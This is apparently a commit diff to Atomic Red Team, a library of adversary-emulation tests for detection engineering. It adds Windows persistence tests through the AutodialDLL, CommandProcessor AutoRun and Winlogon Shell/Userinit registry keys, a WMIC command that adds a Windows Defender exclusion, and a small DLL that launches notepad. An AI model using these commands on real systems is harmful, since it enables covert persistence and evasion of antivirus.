+Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
+
+Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Persistence with Custom AutodialDLL](#atomic-test-1---persistence-with-custom-autodialdll)
+
+
+<br/>
+
+## Atomic Test #1 - Persistence with Custom AutodialDLL
+The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. 
+
+The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
+[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** aca9ae16-7425-4b6d-8c30-cad306fdbd5b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+##### Check Prereq Commands:
+```powershell
+if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
+```
+
+
+
+
+<br/>

atomics/T1546/T1546.yaml

@@ -0,0 +1,28 @@
+attack_technique: T1546
+display_name: Event Triggered Execution
+atomic_tests:
+
+- name: Persistence with Custom AutodialDLL
+  auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
+  description: |
+    The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. 
+    
+    The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
+    [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)
+  supported_platforms:
+  - windows
+  dependencies:
+  - description: |
+      AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+    prereq_command: |
+      if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
+  executor:
+    command: |
+      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+    cleanup_command:
+      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
+    name: powershell
+    elevation_required: true

atomics/T1546/src/AltWinSock2DLL.sln

@@ -0,0 +1,26 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AltWinSock2DLL", "AltWinSock2DLL\AltWinSock2DLL.vcxproj", "{3BB0CD58-487C-4FEC-8001-607599477158}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Debug|Win32.Build.0 = Debug|Win32
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Debug|x64.ActiveCfg = Debug|x64
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Debug|x64.Build.0 = Debug|x64
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Release|Win32.ActiveCfg = Release|Win32
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Release|Win32.Build.0 = Release|Win32
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Release|x64.ActiveCfg = Release|x64
+		{3BB0CD58-487C-4FEC-8001-607599477158}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

atomics/T1546/src/AltWinSock2DLL/AltWinSock2DLL.cpp

@@ -0,0 +1,9 @@
+#include <Windows.h>
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
+{
+    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
+        system("start notepad");
+    }
+    return TRUE;
+}

atomics/T1546/src/AltWinSock2DLL/AltWinSock2DLL.vcxproj

@@ -0,0 +1,153 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{3BB0CD58-487C-4FEC-8001-607599477158}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>AltWinSock2DLL</RootNamespace>
+    <ProjectName>AltWinSock2DLL</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v143</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v143</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v143</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v143</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;AltWinSock2DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;AltWinSock2DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;AltWinSock2DLL_EXPORTS;InitHelperDLL;WIN_X86;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+    <ProjectReference>
+      <LinkLibraryDependencies>false</LinkLibraryDependencies>
+    </ProjectReference>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;AltWinSock2DLL_EXPORTS;InitHelperDLL;WIN_X64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="AltWinSock2DLL.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

atomics/T1546/src/AltWinSock2DLL/AltWinSock2DLL.vcxproj.filters

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="AltWinSock2DLL.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

atomics/T1546/src/AltWinSock2DLL/AltWinSock2DLL.vcxproj.user

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+</Project>

atomics/T1547.001/T1547.001.md

@@ -72,6 +72,10 @@ Adversaries can use these configuration locations to execute malware, such as re
 
 - [Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value ](#atomic-test-15---hklm---modify-default-system-shell---winlogon-shell-key-value-)
 
+- [Atomic Test #16 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-16---hklm---persistence-using-commandprocessor-autorun-key-with-elevation)
+
+- [Atomic Test #17 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-17---hkcu---persistence-using-commandprocessor-autorun-key-with-elevation)
+
 
 <br/>
 
@@ -670,4 +674,84 @@ Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\W
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #16 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a574dafe-a903-4cce-9701-14040f4f3532
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command | Command to Execute | string | notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command | Command to Execute | string | notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$path = "HKCU:\Software\Microsoft\Command Processor"
+if (!(Test-Path -path $path)){
+  New-Item -ItemType Key -Path $path
+}
+New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1547.001/T1547.001.yaml

@@ -332,3 +332,46 @@ atomic_tests:
       Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
     name: powershell
     elevation_required: true
+- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+  auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+  description:  |-
+    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+  supported_platforms:
+  - windows
+  input_arguments:
+    command:
+      description: Command to Execute
+      type: string
+      default: notepad.exe
+  executor:
+    command: |- 
+      New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+    cleanup_command: |-
+      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+  auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+  description:  |-
+    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+  supported_platforms:
+  - windows
+  input_arguments:
+    command:
+      description: Command to Execute
+      type: string
+      default: notepad.exe
+  executor:
+    command: |- 
+      $path = "HKCU:\Software\Microsoft\Command Processor"
+      if (!(Test-Path -path $path)){
+        New-Item -ItemType Key -Path $path
+      }
+      New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+    cleanup_command: |-
+      Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+  

atomics/T1547.004/T1547.004.md

@@ -18,6 +18,10 @@ Adversaries may take advantage of these features to repeatedly execute malicious
 
 - [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
 
+- [Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell](#atomic-test-4---winlogon-hklm-shell-key-persistence---powershell)
+
+- [Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell](#atomic-test-5---winlogon-hklm-userinit-key-persistence---powershell)
+
 
 <br/>
 
@@ -136,4 +140,82 @@ Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell
+PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95a3c42f-8c88-4952-ad60-13b81d929a9d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell
+PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1547.004/T1547.004.yaml

@@ -1,6 +1,7 @@
 attack_technique: T1547.004
 display_name: 'Boot or Logon Autostart Execution: Winlogon Helper DLL'
 atomic_tests:
+
 - name: Winlogon Shell Key Persistence - PowerShell
   auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38
   description: |
@@ -20,6 +21,7 @@ atomic_tests:
     cleanup_command: |
       Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
     name: powershell
+    
 - name: Winlogon Userinit Key Persistence - PowerShell
   auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
   description: |
@@ -39,6 +41,7 @@ atomic_tests:
     cleanup_command: |
       Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
     name: powershell
+
 - name: Winlogon Notify Key Logon Persistence - PowerShell
   auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
   description: |
@@ -58,4 +61,44 @@ atomic_tests:
       Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
     cleanup_command: |
       Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
-    name: powershell
+    name: powershell
+
+- name: Winlogon HKLM Shell Key Persistence - PowerShell
+  auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
+  description: |
+    PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+    Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+  executor:
+    command: |
+      Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+    cleanup_command: |
+      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+    name: powershell
+    
+- name: Winlogon HKLM Userinit Key Persistence - PowerShell
+  auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+  description: |
+    PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+    Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+  executor:
+    command: |
+      Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+    cleanup_command: |
+      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+    name: powershell

atomics/T1553.005/T1553.005.md

@@ -196,7 +196,8 @@ Executes LNK file document.lnk from AllTheThings.iso. Link file executes cmd.exe
 
 
 ```powershell
-$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+$keep = Get-Volume -FileSystemLabel "AllTheThings"
 $driveLetter = ($keep | Get-Volume).DriveLetter
 $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
 $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)

atomics/T1553.005/T1553.005.yaml

@@ -110,7 +110,8 @@ atomic_tests:
       Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "#{path_of_iso}"
   executor:
     command: |
-      $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+      Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+      $keep = Get-Volume -FileSystemLabel "AllTheThings"
       $driveLetter = ($keep | Get-Volume).DriveLetter
       $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
       $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)

atomics/T1562.001/T1562.001.md

@@ -78,6 +78,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
 
 - [Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36---disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
 
+- [Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37---wmic-tamper-with-windows-defender-evade-scanning-folder)
+
 
 <br/>
 
@@ -1517,4 +1519,37 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Applicatio
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder
+The following Atomic will attempt to exclude a folder within Defender leveraging WMI
+Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
+```
+
+#### Cleanup Commands:
+```cmd
+wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
+```
+
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -745,4 +745,19 @@ atomic_tests:
       Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
       Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
     name: powershell 
+    elevation_required: true
+
+- name: WMIC Tamper with Windows Defender Evade Scanning Folder
+  auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
+  description: | 
+    The following Atomic will attempt to exclude a folder within Defender leveraging WMI
